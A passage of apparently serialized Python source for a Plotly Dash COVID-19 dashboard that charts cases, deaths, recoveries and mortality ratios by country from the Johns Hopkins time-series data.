Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n '<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 'showline': True, 'mirror': False}, title=\n 'Recoveries vs. Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 
'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 
'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n 
selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 
'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n 
selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n 
selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n selected_graph].max() * 1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\nif __name__ == '__main__':\n app.run_server()\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 10 01:03:35 2020\r\n\r\n@author: Jordan\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import date\r\n## from COVID19_Simple import *\r\nfrom COVID19_Diff import calc_diff_country\r\n### Dash Stuff ###\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport plotly.graph_objects as go\r\nimport math\r\n\r\n### Initial Code Block; Set Up Data ###\r\nurls = ['https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv',\r\n 
'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv',\r\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv']\r\n\r\n\r\n### Base Country Data (and Transformations)\r\nfinal_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv')\r\nfinal_df = calc_diff_country(final_df)\r\nfinal_df['Date'] = pd.to_datetime(final_df['Date'])\r\n\r\nfinal_df['Country_Region'] = final_df['Country_Region'].astype(str)\r\n\r\n\r\n### 1000 Cases, 10 Deaths, 10 Recovered ### (Global)\r\n## 1000 Cases ##\r\ncases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date']\r\ncases_1000_start = cases_1000_start.reset_index()\r\ncases_1000_start = cases_1000_start.rename(columns={\"Date\":\"Start_Date\"})\r\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\r\ncases_1000_start = pd.merge(cases_1000_start,final_df, on = ['Country_Region'],how='right')\r\ncases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date'])\r\ncases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date'])\r\ncases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()]\r\ncases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days\r\n\r\n\r\n## 100 Deaths ##\r\ndeaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date']\r\ndeaths_100_start = deaths_100_start.reset_index()\r\ndeaths_100_start = deaths_100_start.rename(columns={\"Date\":\"Start_Date\"})\r\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\r\ndeaths_100_start = pd.merge(deaths_100_start,final_df, on = 
['Country_Region'],how='right')\r\ndeaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date'])\r\ndeaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date'])\r\ndeaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()]\r\ndeaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days\r\n\r\n## Mortality Ratios ##\r\nmort = final_df.groupby(['Country_Region'])['Date'].max().reset_index()\r\nmort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left')\r\nmort['Mortality_Percent'] = (mort['Deaths'] / mort['Confirmed'])*100.00\r\n\r\n\r\ncolors_dict_global = {'Europe':'#1D6996','Asia':'#CC503E','Africa':'#94346E', 'North America':'#38A6A5', 'Middle East': '#EDAD08', 'South America':'#E17C05', 'Caribbean & Central America':'#0F8554', 'Oceania':'#73AF48'}\r\n\r\n### Dash Portion of the Script ###\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\nserver=app.server\r\n\r\napp.layout = html.Div(children=[\r\n html.H2(children='COVID-19 Dashboard'),\r\n html.H4(children='A Basic Dashboard to Help Track the COVID-19 Pandemic'),\r\n html.Br(),\r\n html.H5(children='Global View'),\r\n html.P(children='The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. 
The Global View includes the following:'),\r\n html.Div([html.Ul([html.Li([html.B('Cumulative Cases by Country Since First 1000 Cases: '),'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis']),\r\n html.Li([html.B('Cumulative Cases by Country Since First 100 Deaths: '),'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis']),\r\n html.Li([html.B('Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)']),\r\n html.Li([html.B('Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '), 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'])])], style={'font-size': 12}),\r\n html.Br(),\r\n dcc.Dropdown(id='global-dropdown', options=[{'label':y, 'value':y} for y in ['Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)','Recoveries vs. Deaths By Country']], placeholder = 'Pick Graphs From Here...'),\r\n dcc.Graph(id='global-box-1'),\r\n html.Br(),\r\n html.H5(children='Country View'),\r\n html.P('The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. 
The Country View includes the following:'),\r\n html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']),\r\n html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']),\r\n html.Li([html.B('Deaths: '),'Cumulative Deaths from COVID-19 since January 22nd, 2020']),\r\n html.Li([html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'])])]),\r\n dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder = 'Pick a Country From Here...'),\r\n dcc.Dropdown(id='main-dropdown-2', placeholder = 'Pick Graphs From Here...'),\r\n dcc.Graph(id='box-1'),\r\n html.Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id='btext1'), dcc.Graph(id='subplot1')], className = 'four columns', style={'color': '#648FFF'}),\r\n html.Div([html.H6(children='Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id='subplot2')], className = 'four columns', style={'color': '#DC267F'}),\r\n html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id='btext3'), dcc.Graph(id='subplot3')], className = 'four columns', style={'color': '#009E73', 'layout':'right'})], className=\"row\")\r\n])\r\n\r\n## Callback Functionality ## \r\n@app.callback(\r\n Output(component_id='global-box-1', component_property='figure'),\r\n [Input(component_id='global-dropdown', component_property='value')])\r\n\r\ndef global_update(select_global):\r\n if select_global == 'Global Cases Trend' or select_global is None:\r\n\r\n fig1000 = []\r\n anno = []\r\n\r\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\r\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\r\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(),\r\n 
y=di['Confirmed'].tolist(),\r\n mode='lines',\r\n line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=1),\r\n opacity=0.6,\r\n text= di.Country_Region.tolist(),\r\n legendgroup=list(di.loc[:, 'Continent'])[0],\r\n hovertemplate='<b>%{text}</b><br>'+'<br>Confirmed Cases: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>',\r\n showlegend=False)\r\n\r\n a = {'x': int(di['Days Since 1000 Cases'].max()+1.5),\r\n 'y':np.log10(int(di['Confirmed'].max())),\r\n 'xref':'x', 'yref':'y',\r\n 'showarrow':False,\r\n 'text':list(di.loc[:, 'Country_Region'])[0],\r\n 'xanchor':'right', \r\n 'yanchor':'middle',\r\n 'align':'center',\r\n 'font':{'size':8, 'color':'black'},\r\n 'bordercolor':\"#ffffff\",\r\n 'borderwidth':1,\r\n 'borderpad':1,\r\n 'bgcolor':\"#ffffff\",\r\n 'opacity':0.6}\r\n\r\n fig1000.append(trace)\r\n anno.append(a)\r\n\r\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())),\r\n y = [1000 * (math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))],\r\n name='Cases Double Every 3 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dash'),\r\n text=['# of Cases Double Every 3 Days'],\r\n hovertemplate='<b>Cases Double Every 3 Days</b>',\r\n showlegend=True))\r\n\r\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())),\r\n y = [1000 * (math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))],\r\n name='Cases Double Every 7 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dot'),\r\n text=['# of Cases Double Every 7 Days'],\r\n hovertemplate='<b>Cases Double Every 7 Days</b>',\r\n showlegend=True))\r\n\r\n layout_global = go.Layout(yaxis={'title':'Number of Confirmed Cases', 'range':[np.log10(1000), np.log10(cases_1000_start['Confirmed'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 
'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False},\r\n title='Overall Confirmed Cases',\r\n xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start['Days Since 1000 Cases'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno)\r\n\r\n fig_global={'data':fig1000, 'layout': layout_global}\r\n return fig_global\r\n\r\n elif select_global == 'Global Deaths Trend':\r\n fig100 = []\r\n anno = []\r\n\r\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\r\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\r\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(),\r\n y=di['Deaths'].tolist(),\r\n mode='lines',\r\n line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=1),\r\n opacity=0.6,\r\n text= di.Country_Region.tolist(),\r\n legendgroup=list(di.loc[:, 'Continent'])[0],\r\n hovertemplate='<b>%{text}</b><br>'+'<br>Deaths: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>',\r\n showlegend=False)\r\n\r\n a={'x': int(di['Days Since 100 Deaths'].max()+1.5),\r\n 'y':np.log10(int(di['Deaths'].max())),\r\n 'xref':'x', 'yref':'y',\r\n 'showarrow':False,\r\n 'text':list(di.loc[:, 'Country_Region'])[0],\r\n 'xanchor':'right', \r\n 'yanchor':'middle',\r\n 'align':'center',\r\n 'font':{'size':8, 'color':'black'},\r\n 'bordercolor':\"#ffffff\",\r\n 'borderwidth':1,\r\n 'borderpad':1,\r\n 'bgcolor':\"#ffffff\",\r\n 'opacity':0.6}\r\n\r\n fig100.append(trace)\r\n anno.append(a)\r\n\r\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())),\r\n y = [100 * (math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))],\r\n name='Deaths Double Every 3 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dash'),\r\n text=['# of Deaths Double Every 3 Days'],\r\n 
hovertemplate='<b>Deaths Double Every 3 Days</b>',\r\n showlegend=True))\r\n\r\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())),\r\n y = [100 * (math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))],\r\n name='Deaths Double Every 7 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dot'),\r\n text=['# of Deaths Double Every 7 Days'],\r\n hovertemplate='<b>Deaths Double Every 7 Days</b>',\r\n showlegend=True))\r\n\r\n layout_global = go.Layout(yaxis={'title':'Number of Deaths', 'range':[np.log10(100), np.log10(cases_1000_start['Deaths'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False},\r\n title='Overall Deaths',\r\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno)\r\n\r\n fig_global={'data':fig100, 'layout': layout_global}\r\n return fig_global\r\n\r\n\r\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\r\n figmort = []\r\n anno =[]\r\n\r\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\r\n m = m.sort_values(by=['Mortality_Percent'], ascending=True).reset_index()\r\n\r\n for i in range(len(m)):\r\n\r\n m1 = m.loc[i, 'Country_Region']\r\n #m1 = [str(i) for i in m1]\r\n m2 = m.loc[i, 'Mortality_Percent']\r\n #m2 = [str(round(i, 2)) for i in m2]\r\n trace = go.Bar(name='Observed Case - Mortality Ratio',\r\n x = [m2],\r\n y= [m1],\r\n text = [round(m.loc[i, 'Mortality_Percent'], 2)],\r\n orientation ='h',\r\n textposition='auto',\r\n marker = dict(color='#FFB000', opacity=0.6, line=dict(color='rgba(255,176,0, 1)', width=1)),\r\n hovertemplate='<b>%{y}</b><br>'+'<br>Observed Case 
Mortaility Pct: %{text}&#37;<br>',\r\n showlegend=False)\r\n\r\n figmort.append(trace)\r\n\r\n layout_global = go.Layout(yaxis={'title':'Country / Region','fixedrange':True, 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Observed Case - Mortality Ratio',\r\n xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [0, m['Mortality_Percent'].max() + 2], 'fixedrange':True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=750, hovermode='closest')\r\n fig_global={'data':figmort, 'layout': layout_global}\r\n return fig_global\r\n\r\n\r\n elif select_global == 'Recoveries vs. Deaths By Country':\r\n figscat = []\r\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >=100)].reset_index()\r\n\r\n for i in range(len(rc)):\r\n scat = go.Scatter(\r\n x=[rc.loc[i, 'Deaths']],\r\n y=[rc.loc[i, 'Recovered']],\r\n mode='markers+text',\r\n text=[rc.loc[i, 'Country_Region']],\r\n marker_color=(colors_dict_global[rc.loc[i, 'Continent']]),\r\n showlegend=False,\r\n marker=dict(size=12,line_width=1, opacity=0.75),\r\n hovertemplate='<b>%{text}</b><br>'+'<br>Recoveries: %{y}<br>'+'Deaths: %{x}<br>',\r\n textposition='bottom center',\r\n textfont=dict(size=10, color='rgba(0, 0, 0, 0.6)')\r\n )\r\n\r\n figscat.append(scat)\r\n\r\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)),\r\n y = [i for i in list(np.linspace(100, rc['Deaths'].max(), 3))],\r\n mode='lines',\r\n name='Deaths = Recoveries',\r\n opacity=.25,\r\n line = dict(color='grey', width=1),\r\n text=['# of Deaths = # of Recoveries'],\r\n hovertemplate='<b># of Deaths = # of Recoveries</b>',\r\n showlegend=True))\r\n\r\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)),\r\n y = [i*2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))],\r\n mode='lines',\r\n name='2 Recoveries for Every Death',\r\n opacity=.25,\r\n line = dict(color='green', width=3, 
dash='dash'),\r\n text=['2 Recoveries for Every Death'],\r\n hovertemplate='<b>2 Recoveries for Every Death</b>',\r\n showlegend=True))\r\n\r\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)),\r\n y = [i/2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))],\r\n mode='lines',\r\n name='2 Deaths for Every Recovery',\r\n opacity=.25,\r\n line = dict(color='firebrick', width=3, dash='dash'),\r\n text=['2 Deaths for Every Recovery'],\r\n hovertemplate='<b>2 Deaths for Every Recovery</b>',\r\n showlegend=True))\r\n\r\n layout_global = go.Layout(yaxis={'title':'Number of Recoveries','fixedrange':True, 'automargin': True, 'range':[np.log10(100), np.log10(rc['Recovered'].max() * 1.10)], 'type':'log', 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False},\r\n title='Recoveries vs. Deaths, By Country',\r\n xaxis={'title': 'Number of Deaths','fixedrange':True, 'range':[np.log10(100), np.log10(rc['Deaths'].max() * 1.10)], 'type':'log', 